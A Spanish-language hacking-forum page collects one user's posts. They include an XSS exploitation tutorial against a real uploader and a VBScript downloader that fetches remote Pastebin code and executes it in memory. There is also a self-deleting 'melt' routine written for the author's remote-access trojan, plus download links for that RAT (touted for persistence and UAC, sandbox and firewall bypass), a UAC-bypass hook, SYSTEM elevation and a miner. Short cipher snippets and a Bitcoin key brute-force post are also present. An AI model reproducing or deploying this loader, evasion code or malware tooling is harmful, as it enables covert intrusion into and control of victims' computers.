elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Comprendiendo y Explotando un IFXSS en: 23 Mayo 2014, 01:09 am
Este tutorial tiene ya su tiempo, y hace unos dias lo recupere, asi que aqui lo comparto.  ;D

Antes de nada, aclarar que la vulnerabilidad que voy a explotar en este tutorial, ha sido reportada, y espero que corregida, ya solo dar las gracias a JKS por descubrir y darle nombre a esta Vulnerabilidad, y a Sanko, por ayudarme en algunas cosillas.

- ¿Qué es un IFXSS?
Técnicamente, un IFXSS (Image Filename Cross Site Scripting), oh como dice su nombre, es una vulnerabilidad que se debe al mal filtrado del nombre de una imagen, permitiendo la ejecución de código en el servidor.

- ¿Qué daño puede causar un IFXSS?
Basicamente un IFXSS no causa daño, a no ser de que sea Stored, entonces todo el mundo que acceda a la pagina visualizara el IFXSS.

- ¿Donde encontrar un IFXSS?
Puedes encontrar un IFXSS en cualquier Uploader, que muestre el nombre del archivo y que con suerte no este bien filtrado.

Muy bien, explicado esto, pasamos a explotar un IFXSS en un caso real.
La pagina afectada es , la vulnerabilidad ya ha sido reportada, es cuestión de tiempo que la corrijan.

Bien, al acceder a la web, podemos ver un uploader, lo primero sera subir una foto, en este caso se llama ''Avatar.png'', para ver que tenemos por hay...


Observamos que el nombre de la imagen, no se ve por ninguna parte, pero aún nos queda un intento.


Como puedes ver, la pagina muestra Files with the extension .txt are not allowed. ¿Qué? ¿Que no muestra el nombre del archivo? Claro, pero nos muestra la extensión jaja.

Bien, ya que vemos que cuando hay error, la pagina guarda la extension del archivo, probemos a insertar el siguiente codigo como extension:
Código:
"<h1 onclick=alert('SafeCoders')>xss"


Y hay esta, nuestra querida alerta, que aparece al dar click en la web.  ;D

Bueno, aquí concluye el Tutorial, espero que les sea útil, y que comenten si tienen alguna duda.

//Regards.
2  Seguridad Informática / Análisis y Diseño de Malware / [SOURCE]RST Miner v3.0 en: 23 Mayo 2014, 01:03 am
Bueno, sin mas, en su tiempo ese miner era bueno, ademas esta sacado de la VIP de Romanian Security Team.

Descarga: https://mega.co.nz/#!91h00aDb!WWlUzQm2Bao79k058C8RL1oBmcYnb66hKVtbvZ1aLwo

//Regards.
3  Programación / Scripting / [AUTOIT]SYSTEM Elevation en: 23 Mayo 2014, 01:00 am
Bueno, esta función hace uso de PsExec para elevar cualquier proceso a SYSTEM, necesita privilegios de Administrador.  ;D

Link: http://www.sendspace.com/file/s8phij

PD: Subi el archivo por que en PasteBin excedia el limite y en el foro tambien.  :-\

//Regards.
4  Programación / Scripting / [AUTOIT]Bypass UAC 32/64 Bits en: 23 Mayo 2014, 00:53 am
Una cosita que tenia en el Baul, hace un Hook al Cartelito de la UAC y lo Acepta Automaticamente, todos los creditos para su creador, yo solo lo adapte como función para su uso.  ;D

http://pastebin.com/rjWgMXfP

PD: Funcional en 32 y 64 Bits, Soporte UNICODE.

//Regards.
5  Programación / Scripting / [AUTOIT]Cifrado RotN en: 23 Mayo 2014, 00:48 am
Bueno, no tiene mucho la verdad, mi versión de RotN.  ;D

Código
  1. Func RotN($Text, $Long, $Encrypt)
  2.    Local $sResult = ""
  3.  
  4.    If $Encrypt = True Then
  5.        For $i = 1 To StringLen($Text)
  6.            $sResult = Chr(Asc(StringMid($Text, $i, 1)) + $Long) & $sResult
  7.        Next
  8.    Else
  9.        For $i = 1 To StringLen($Text)
  10.            $sResult = Chr(Asc(StringMid($Text, $i, 1)) - $Long) & $sResult
  11.        Next
  12.    EndIf
  13.    Return $sResult
  14. EndFunc

PD: La variable $Encrypt la ponen en True si quieren que Encripte y en False si quieren que Desencripte.

//Regards.
6  Seguridad Informática / Análisis y Diseño de Malware / [OPEN SOURCE]SafeLoader v2.0 Beta en: 2 Abril 2014, 18:38 pm
Lo primero de todo, aclarar que SafeLoader es una herramienta de Administración Remota OPEN SOURCE creada para su analisis y estudio, no me hago responsable del mal uso que puedan darle.

Image:
http://i.imgur.com/KOkUvIB.png

Scan:
http://www.indetectables.net/scanner.php?report=7g4z9glu24


Features:
-Coded in VBS (Work in All Windows)
-Anti-Track Panel
-Easy to Install
-All Traffic is Encrypted
-StartUP with Startup Folders
-StartUP with Regedit
-Startup with Windows Tasks
-GeoLocation with GeoIP
-VBS Downloader and Load in Memory
-Stable Update
-Full Uninstall
-Small Size (8Kb)
-Easy Cryptable
-Fuck UAC, SandBox and Firewall
[/center]

Credits:
-MadAntrax (Puse dos de tus StartUP's)
-Strup (Por traducir el cifrado a PHP) <3
-Houdini (Me base en el H-Worm, aunque da Pena y Dolor leerlo.)


Download:
http://www.sendspace.com/file/e4kahw

PD: Eso es todo, recuerden que es una Versión Beta, y aun le queda mucho por mejorar, asi que comuniquen cualquier error.

PD2: Proxima Versión será Polimorfica.  :drinking:

//Regards.
7  Seguridad Informática / Hacking / Stealing BitCoins with BruteForce en: 22 Marzo 2014, 20:08 pm
No se si esta es la Sección correcta, si no lo es, porfavor lleven el tema a su lugar.

Hace un tiempo que me hablaron de un tipo de Ataque por Fuerza Bruta a BitCoin para hacerse con las Cuentas de los usuarios, hoy explicare un poco en que consiste el Ataque.

Las Cuentas o "Address", son digamos los Monederos BTC's, que disponen de una Clave Unica y Privada Auto-Generada de 51 Caracteres AlfaNumericos, esto hace un total de 6.0466176e+17 Private Keys, en el Mercado Negro estan disponibles Listas de Private Keys con su respectivo Address, las cuales se procesan para ver que Address tiene Dinero y sí sera Rentable para el Ladrón.

Con esto, quiero decir que el BitCoin ha dejado de ser Seguro, aunque con un calculo Aproximado basado en una Aplicación Propia, que revisa 1024 Cuentas por Minuto, se necesitaria una media de 1.123.458.904 Años para testear todas las cuentas, pero tu Address podria ser una de las primeras.

PD: Abria puesto unos Address de ejemplo, pero no lo veo adecuado.

//Regards.
8  Programación / Scripting / [VBS]Perfect Melt en: 18 Marzo 2014, 01:25 am
Bueno, este Melt lo acabo de hacer para el SafeLoader 2.0, trata de no dejar ningun rastro del archivo, por eso todo se hace "On the Fly".  >:D

Código
  1. sMelt(WScript.ScriptFullName)
  2.  
  3. Function sMelt(sFile)
  4.    On Error Resume Next
  5.  
  6. Dim sFunction
  7.  
  8.    sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & sFile & Chr(34)
  9.  
  10. Execute(sFunction)
  11. End Function

//Regards.
9  Programación / Scripting / [VBS]Simple Cifrado XOR en: 17 Marzo 2014, 22:35 pm
Bueno esto es una traducción simple que hice del XOR a VBS.   ;D

Código
  1. Function sXOR(sText, sKey)
  2.    On Error Resume Next
  3.  
  4. Dim i, s, k
  5.  
  6. For i = 1 To Len(sText)
  7.    s = Mid(sText, i, 1): k = Asc(s): k = k Xor Len(sKey): k = Chr(k): sXOR = sXOR & k
  8. Next
  9. End Function

//Regards.
10  Programación / Scripting / PasteBin Downloader VBScript en: 17 Marzo 2014, 22:21 pm
Bueno, esto es un simple PasteBin Downloader, lo que hace basicamente es descargar el codigo (VBScript) de PasteBin y ejecutarlo en memoria.

Código
  1. Function sDownloader(sPasteID)
  2.    On Error Resume Next
  3.  
  4.    Dim GetCode, GetResponse
  5.  
  6.    Set GetCode = CreateObject("MSXML2.XMLHTTP")
  7.    GetCode.Open "GET", "http://pastebin.com/raw.php?i=" & sPasteID, False
  8.    GetCode.Send
  9.  
  10.    GetResponse = GetCode.ResponseText
  11.    Execute(GetResponse)
  12. End Function

//Regards.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines